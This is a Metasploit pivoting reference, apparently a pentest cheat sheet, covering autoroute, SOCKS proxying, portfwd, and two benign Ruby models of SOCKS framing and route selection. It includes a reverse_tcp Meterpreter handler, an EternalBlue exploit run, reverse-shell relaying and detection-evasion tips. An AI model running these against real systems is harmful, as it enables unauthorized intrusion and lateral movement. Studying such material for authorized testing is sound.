
Metasploit Routing and Forwarding

#Overview

Metasploit provides built-in routing and port forwarding through Meterpreter sessions. Routes live in msfconsole's own routing table: Metasploit modules and the SOCKS proxy consult it and send matching traffic over the session instead of the attacker's network stack. This is useful when you already have a Meterpreter session on a pivot host and don't want to upload additional tooling (Chisel, Ligolo-ng) to it.

#autoroute (Extended)

#Auto-Route from Session

# From Meterpreter prompt
meterpreter> run autoroute -s 172.16.0.0/24

# From msf console (specify session)
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.0.0/24
msf6 post(multi/manage/autoroute) > run

# Route multiple subnets
meterpreter> run autoroute -s 172.16.0.0/24
meterpreter> run autoroute -s 192.168.0.0/16
meterpreter> run autoroute -s 10.0.0.0/8

#View and Remove Routes

# List active routes
msf6 > route

# Remove a route
msf6 > route remove 172.16.0.0 255.255.255.0 1

# Remove all routes (every session, not just one)
msf6 > route flush

#Manual Route Add

autoroute with -s (or SUBNET) is just a wrapper around `route add`. Add routes manually when you want a single-host route, need a specific netmask, or want to point a subnet at a different session than the one that discovered it. The last argument is the session ID, which acts as the gateway.

# Basic route: subnet through session
msf6 > route add 172.16.0.0 255.255.255.0 1

# Single host route
msf6 > route add 172.16.0.10 255.255.255.255 1

# Route through specific session
msf6 > route add 192.168.0.0 255.255.0.0 2

# Verify routes
msf6 > route

# Output:
# Subnet          Netmask          Gateway
# ------          -------          -------
# 172.16.0.0      255.255.255.0    Session 1
# 192.168.0.0     255.255.0.0      Session 2

#SOCKS Proxy through Meterpreter

Set up a SOCKS proxy that routes traffic through the Meterpreter session. Other tools (nmap, curl, browser) can use this proxy.

# Step 1: Add route to target subnet
msf6 > route add 172.16.0.0 255.255.255.0 1

# Step 2: Start SOCKS proxy server
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > run -j

# Step 3: Use with proxychains
# Edit /etc/proxychains4.conf (enable proxy_dns if hostnames should be resolved through the proxy):
# socks5 127.0.0.1 1080

# SOCKS only carries TCP connections. nmap's ping sweep (-sn), SYN scan (-sS) and any
# UDP/ICMP probes use raw sockets that proxychains cannot hook, so use a connect scan
# and skip host discovery
proxychains4 nmap -sT -Pn 172.16.0.0/24 -p 22,80,445
proxychains4 curl http://172.16.0.10/

#SOCKS4a vs SOCKS5

# SOCKS5 (default, recommended)
msf6 auxiliary(server/socks_proxy) > set VERSION 5

# SOCKS4a (for tools that don't support SOCKS5)
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
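
What proxychains actually sends to the listener on 127.0.0.1:1080, and how VERSION 5 and VERSION 4a differ on the wire, is easiest to see by building the messages by hand. The following Ruby is an added example written for this page; it is neither the Metasploit socks_proxy module's code nor proxychains' code. The proxy at the bottom is a constructed stand-in that grants every CONNECT so the exchange can run offline; the host names and ports are constructed too.

```ruby
# Added example (not Metasploit's socks_proxy or proxychains code): SOCKS5 and
# SOCKS4a CONNECT framing as a client sends it to 127.0.0.1:1080, plus a
# constructed stand-in proxy that always grants the request.
require 'stringio'

module SocksWire
  IPV4_RE = /\A\d{1,3}(?:\.\d{1,3}){3}\z/

  # --- SOCKS5 (RFC 1928): greeting first, then a CONNECT request ---
  def self.socks5_greeting
    [0x05, 0x01, 0x00].pack('C*')   # VER=5, NMETHODS=1, METHOD 0x00 = no authentication
  end

  def self.socks5_connect(host, port)
    addr = if host.match?(IPV4_RE)
             [0x01].pack('C') + host.split('.').map(&:to_i).pack('C4')   # ATYP 1: IPv4
           else
             [0x03, host.bytesize].pack('CC') + host                      # ATYP 3: domain, resolved by the proxy
           end
    [0x05, 0x01, 0x00].pack('C*') + addr + [port].pack('n')   # VER, CMD=CONNECT, RSV, DST.ADDR, DST.PORT
  end

  REPLY5 = { 0 => 'succeeded', 1 => 'general SOCKS server failure', 2 => 'connection not allowed by ruleset',
             3 => 'network unreachable', 4 => 'host unreachable', 5 => 'connection refused',
             6 => 'TTL expired', 7 => 'command not supported', 8 => 'address type not supported' }.freeze

  def self.parse_socks5_reply(io)
    ver, rep, _rsv, atyp = io.read(4).unpack('C4')
    raise "unexpected SOCKS version #{ver}" unless ver == 0x05
    bind = case atyp
           when 0x01 then io.read(4).unpack('C4').join('.')
           when 0x03 then io.read(io.read(1).unpack1('C'))
           when 0x04 then io.read(16).unpack('n8').map { |h| h.to_s(16) }.join(':')
           else raise "bad ATYP #{atyp}"
           end
    { code: rep, status: REPLY5.fetch(rep, 'unknown'), bind_addr: bind, bind_port: io.read(2).unpack1('n') }
  end

  # --- SOCKS4a: no greeting, a single CONNECT; a hostname may follow the userid ---
  def self.socks4a_connect(host, port, userid = '')
    head = [0x04, 0x01, port].pack('CCn')   # VN=4, CD=1 (CONNECT), DSTPORT
    if host.match?(IPV4_RE)
      head + host.split('.').map(&:to_i).pack('C4') + userid + "\0"
    else
      # 4a extension: DSTIP 0.0.0.x (x != 0) tells the proxy a NUL-terminated hostname follows
      head + [0, 0, 0, 1].pack('C4') + userid + "\0" + host + "\0"
    end
  end

  def self.parse_socks4_reply(io)
    _vn, cd, port, ip = io.read(8).unpack('CCnN')
    { granted: cd == 0x5a, code: cd, bind_addr: [ip].pack('N').unpack('C4').join('.'), bind_port: port }
  end
end

# Constructed stand-in for the proxy side: selects "no auth" and grants any
# CONNECT with a 0.0.0.0:0 bind address. A real proxy only succeeds if the
# destination is reachable, directly or through a Metasploit route.
class FakeSocks5Proxy
  def method_select(greeting)
    ver, nmethods = greeting.unpack('C2')
    offered = greeting.byteslice(2, nmethods).unpack('C*')
    return [0x05, 0xff].pack('C2') unless ver == 0x05 && offered.include?(0x00)  # 0xff = no acceptable method
    [0x05, 0x00].pack('C2')
  end

  def connect(request)
    ver, cmd = request.unpack('C2')
    rep = (ver == 0x05 && cmd == 0x01) ? 0x00 : 0x07   # 0x07 = command not supported
    [0x05, rep, 0x00, 0x01, 0, 0, 0, 0].pack('C*') + [0].pack('n')
  end
end

# The full client-side SOCKS5 exchange, as proxychains performs it per connection.
def socks5_exchange(host, port, proxy = FakeSocks5Proxy.new)
  selected = proxy.method_select(SocksWire.socks5_greeting)
  raise 'proxy accepted none of our auth methods' if selected.unpack('C2')[1] == 0xff
  SocksWire.parse_socks5_reply(StringIO.new(proxy.connect(SocksWire.socks5_connect(host, port))))
end

if __FILE__ == $PROGRAM_NAME
  p SocksWire.socks5_connect('172.16.0.10', 80).unpack('C*')
  p SocksWire.socks4a_connect('intranet.local', 443).unpack('C*')
  p socks5_exchange('172.16.0.10', 80)
end
```

The practical difference shows in the address field: SOCKS5 carries the hostname with ATYP 3 and SOCKS4a uses the 0.0.0.1 marker, and in both cases the name is resolved by the proxy (and therefore, through Metasploit, by the pivot's resolver) only if the client is configured to hand it over, which is what proxy_dns in proxychains4.conf controls. Neither version carries UDP in this setup, which is why the nmap flags above are restricted to a TCP connect scan.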

#portfwd (Extended)

#Local Port Forward

# Forward local 8080 through Meterpreter to 172.16.0.10:80
meterpreter> portfwd add -l 8080 -p 80 -r 172.16.0.10

# Forward multiple ports
meterpreter> portfwd add -l 3306 -p 3306 -r 172.16.0.20
meterpreter> portfwd add -l 6379 -p 6379 -r 172.16.0.30

# List forwards
meterpreter> portfwd list

# Delete a forward
meterpreter> portfwd delete -l 8080

#Reverse Port Forward (-R)

# Reverse forward: listen on the PIVOT host, relay connections back to the attacker
# With -R the flags change meaning:
#   -p = port to listen on (pivot side)
#   -l = port to connect to (attacker side)
#   -L = host to connect to (attacker side)
meterpreter> portfwd add -R -p 8080 -l 4444 -L 127.0.0.1

# This binds port 8080 on the PIVOT host
# Connections to pivot:8080 are relayed to 127.0.0.1:4444 on the attacker machine
# Useful for catching reverse shells from internal hosts: start a handler on 4444
# and point the payload's LHOST/LPORT at the pivot's internal address and port 8080

#Forward with Specific Local Bind

# Bind the listening side to a chosen local address. 0.0.0.0 exposes the forward to
# every host that can reach the attacker machine, so restrict or firewall it on shared
# networks; -L 127.0.0.1 keeps it local to the attacker host
meterpreter> portfwd add -l 8080 -L 0.0.0.0 -p 80 -r 172.16.0.10

#Combining autoroute + SOCKS + Modules

The real power of Metasploit routing is combining it with other modules that automatically use the routes.

# Step 1: Get Meterpreter session
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
msf6 exploit(multi/handler) > run

# Step 2: Add route through the session
meterpreter> run autoroute -s 172.16.0.0/24
meterpreter> background

# Step 3: Scan the routed subnet (uses the route automatically)
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.0.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22,80,445,3389
msf6 auxiliary(scanner/portscan/tcp) > run

# Step 4: Exploit through the route
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.16.0.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

# Step 5: Set up SOCKS for external tools
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > run -j

# Now use proxychains with external tools:
proxychains4 nmap -sT -Pn 172.16.0.0/24 -p 22,80,445

#Pivoting Through Multiple Sessions

# Session 1: Direct access to DMZ host
# Session 2: DMZ host exploited, access to internal host
# Session 3: Internal host exploited, access to core network

# Route DMZ subnet through session 1
msf6 > route add 10.10.0.0 255.255.255.0 1

# Route internal subnet through session 2
msf6 > route add 172.16.0.0 255.255.255.0 2

# Route core subnet through session 3
msf6 > route add 192.168.0.0 255.255.255.0 3

# Now Metasploit modules can reach all three subnets
# SOCKS proxy also routes through all sessions

#Common Pitfalls

  1. Session dies = route dies: routes are keyed to a session ID, so when the Meterpreter session drops every subnet routed through it becomes unreachable, and a replacement session gets a new ID, so the routes must be added again. Prefer reverse_https (it reconnects after a dropped connection) and consider registering a fallback transport with `transport add`.
  2. SOCKS proxy is slow: every proxied connection is multiplexed over the Meterpreter channel, so the Metasploit SOCKS proxy is significantly slower than Chisel or Ligolo-ng. Use it for scanning and small requests, not for large data transfers.
  3. TCP only: Meterpreter portfwd forwards TCP only, and the SOCKS proxy only handles TCP CONNECT, so ping sweeps and UDP scans from external tools will not work through either. For UDP, run Metasploit's own scanner modules (e.g. auxiliary/scanner/discovery/udp_sweep) over the route; nothing forwards ICMP, so ping-based host discovery never works through a pivot.
  4. autoroute needs an active session: the session can be backgrounded (routing keeps working), but it must stay alive; a backgrounded session that times out takes its routes with it.
  5. Route conflicts: when routes overlap, the most specific match (longest netmask) wins, and equally specific routes are ambiguous, so adding a broad route such as 10.0.0.0/8 on top of narrower ones can silently send traffic through a different session than you expect. Check `route` before adding overlapping subnets, and use `route remove` rather than stacking corrections.
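
How msfconsole picks a session when routes overlap, which is what the multi-session setup and pitfall 5 both turn on, is easiest to see in a small model. The following Ruby is an added example written for this page, not Metasploit's own code (the real table is Rex::Socket::SwitchBoard). It reproduces longest-prefix selection; the tie-break on equal prefix length (most recently added route wins) and the conflict report are this example's own choices and should be verified against your Metasploit version. Session numbers and subnets are constructed and follow the three-session table above, plus one broad /16 that overlaps it.

```ruby
# Added example, not Metasploit's code: a model of the msfconsole routing table
# showing which session carries traffic for a destination when routes overlap.
# Longest-prefix match mirrors Rex::Socket::SwitchBoard; the tie-break and the
# conflict report are this example's own assumptions.

def ip_to_i(dotted)
  octets = dotted.split('.').map(&:to_i)
  raise ArgumentError, "bad IPv4 #{dotted}" unless octets.size == 4 && octets.all? { |o| o.between?(0, 255) }
  octets.inject(0) { |acc, o| (acc << 8) | o }
end

def i_to_ip(n)
  [n].pack('N').unpack('C4').join('.')
end

Route = Struct.new(:subnet, :netmask, :session) do
  def prefix_len
    netmask.to_s(2).count('1')
  end

  def covers?(addr)
    (addr & netmask) == subnet
  end

  def to_s
    "#{i_to_ip(subnet)}/#{prefix_len} -> Session #{session}"
  end
end

class RouteTable
  def initialize
    @routes = []
  end

  # msf6 > route add <subnet> <netmask> <session>
  def add(subnet, netmask, session)
    m = ip_to_i(netmask)
    @routes << Route.new(ip_to_i(subnet) & m, m, session)
    self
  end

  # msf6 > route remove <subnet> <netmask> <session>
  def remove(subnet, netmask, session)
    m = ip_to_i(netmask)
    @routes.reject! { |r| r.subnet == (ip_to_i(subnet) & m) && r.netmask == m && r.session == session }
    self
  end

  # msf6 > route flush
  def flush
    @routes.clear
    self
  end

  # Session that carries traffic for addr; nil means no route, sent directly from the attacker host
  def session_for(addr)
    a = ip_to_i(addr)
    best = nil
    best_len = -1
    @routes.each do |r|
      next unless r.covers?(a)
      if r.prefix_len >= best_len         # >= : the later route wins a tie (assumption)
        best = r.session
        best_len = r.prefix_len
      end
    end
    best
  end

  # Pairs of routes where one subnet lies inside the other but they point at different sessions
  def conflicts
    @routes.combination(2).select do |x, y|
      wide, narrow = x.prefix_len <= y.prefix_len ? [x, y] : [y, x]
      x.session != y.session && wide.covers?(narrow.subnet)
    end.map { |x, y| [x.to_s, y.to_s] }
  end

  def to_s
    @routes.map(&:to_s).join("\n")
  end
end

# The three-session table from above plus a broad /16 added afterwards through session 1,
# which is exactly the overlap pitfall 5 warns about.
def demo_table
  RouteTable.new
    .add('10.10.0.0', '255.255.255.0', 1)    # DMZ via session 1
    .add('172.16.0.0', '255.255.255.0', 2)   # internal via session 2
    .add('192.168.0.0', '255.255.255.0', 3)  # core via session 3
    .add('172.16.0.0', '255.255.0.0', 1)     # broad /16 layered on top, via session 1
end

if __FILE__ == $PROGRAM_NAME
  t = demo_table
  puts t
  %w[10.10.0.5 172.16.0.20 172.16.5.9 192.168.0.1 8.8.8.8].each { |dst| puts "#{dst} -> #{t.session_for(dst).inspect}" }
  t.conflicts.each { |a, b| puts "overlap: #{a} vs #{b}" }
end
```

Running it shows 172.16.0.20 still going through session 2 because the /24 is more specific than the later /16, while 172.16.5.9 goes through session 1 and is likely unreachable from the DMZ host. Adding a second 172.16.0.0/24 route for another session makes the two equally specific, and which one wins is then down to table order, so remove the old one first.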

#OPSEC Considerations

  • Metasploit routes are in-memory only: they disappear when msfconsole exits, so keep the `route add` lines in a resource script if you will need to recreate them
  • The SOCKS listener runs on the attacker host, not the pivot, so it is not something the target's port scans will find; what the target network does see is every proxied connection leaving the pivot host, which stands out in NetFlow, firewall logs and EDR network telemetry
  • autoroute changes nothing on the pivot host: the route is an entry in msfconsole's table and no new process is created
  • portfwd is handled inside the existing Meterpreter process over the existing session: no new process, and a normal (non -R) forward opens no listener on the pivot. A reverse forward (-R) does bind a port on the pivot, which is visible in netstat and host firewall logs
  • Use reverse_https Meterpreter for OPSEC-friendly C2 through the pivot

#Cross-References